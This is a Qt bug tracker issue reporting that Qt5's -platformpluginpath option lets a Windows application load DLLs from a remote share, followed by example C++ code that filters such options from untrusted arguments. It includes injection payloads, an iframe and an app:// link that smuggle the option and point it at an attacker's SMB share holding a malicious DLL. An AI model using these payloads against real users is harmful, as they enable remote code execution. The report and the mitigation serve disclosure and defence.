Qt / QTBUG-75882

commandline - platformpluginpath may cause serious Problem


Details

    • Windows

    Description

      A Qt5 application will, depending on certain metadata, automatically execute the plugins pointed to by platformpluginpath as soon as they are loaded into memory.

      For example,

      myTest.exe -platformpluginpath C:/Path-of-library/specific

      will load and execute all DLLs in the C:/Path-of-library/specific/imageformats directory. 

       <iframe src='myTest;?" - platformpluginpath \\192.162.x.y\share "'>

      This remote “share” contains an “imageformats” directory that holds a “malicious.dll” file. Since Qt loads plugins based on their metadata, the DLL name does not matter.

      Another scenario:

      Suppose a custom URL scheme is registered for an application in Windows, e.g. app://. The user has this application installed and the URL scheme registered.

      Create a webpage with a link to 'app://? "-platformpluginpath \\SERVER\SharedFolder\"'.

      When the user opens such a page on his PC and clicks this link, your application is started on his machine and the platform plugin is loaded from the shared folder. This platform plugin can be qwindows.dll with injected code.

      There are two nicely detailed articles about this potentially dangerous situation:

      https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739

      https://www.bleepingcomputer.com/news/security/qt5-based-gui-apps-susceptible-to-remote-code-execution/
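One way an application can defend against the behaviour described above, as an added example (not code from Qt or from this report): remove plugin-selecting options from an untrusted argument list, such as one arriving through a URL handler, before it reaches QApplication. The function names are hypothetical, and covering -platform and -plugin alongside -platformpluginpath is this example's assumption.

```cpp
#include <cstdio>
#include <string>
#include <vector>

// Options that decide which plugin binaries a Qt GUI application loads and
// that take their value from the next argument. -platformpluginpath is the
// one in this report; adding -platform and -plugin is an assumption here.
static const char* const kPluginOptions[] = {
    "-platformpluginpath", "-platform", "-plugin"};

// Assumption: a leading "--" is accepted like "-", so both are matched.
static bool isPluginOption(std::string arg) {
    if (arg.rfind("--", 0) == 0) arg.erase(0, 1);
    for (const char* opt : kPluginOptions)
        if (arg == opt) return true;
    return false;
}

// Returns a copy of args without plugin-selecting options and their values.
// Removed tokens are appended to *dropped (if given) so they can be logged.
std::vector<std::string> stripPluginOptions(
        const std::vector<std::string>& args,
        std::vector<std::string>* dropped = nullptr) {
    std::vector<std::string> kept;
    for (std::size_t i = 0; i < args.size(); ++i) {
        if (i > 0 && isPluginOption(args[i])) {  // args[0] is the program name
            if (dropped) dropped->push_back(args[i]);
            if (i + 1 < args.size()) {           // the option's value, if any
                ++i;
                if (dropped) dropped->push_back(args[i]);
            }
            continue;
        }
        kept.push_back(args[i]);
    }
    return kept;
}

int main(int argc, char** argv) {
    std::vector<std::string> args(argv, argv + argc);
    std::vector<std::string> dropped;
    std::vector<std::string> safe = stripPluginOptions(args, &dropped);
    for (const std::string& d : dropped)
        std::fprintf(stderr, "ignored untrusted argument: %s\n", d.c_str());
    // From here, build argc/argv from `safe` and construct QApplication with it.
    return dropped.empty() ? 0 : 1;
}
```

Filtering has to happen before the QApplication object is constructed, because that is where the argument list is handed to Qt.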

          People

            thiago Thiago Macieira
            irfan.omair@digia.com Irfan Omair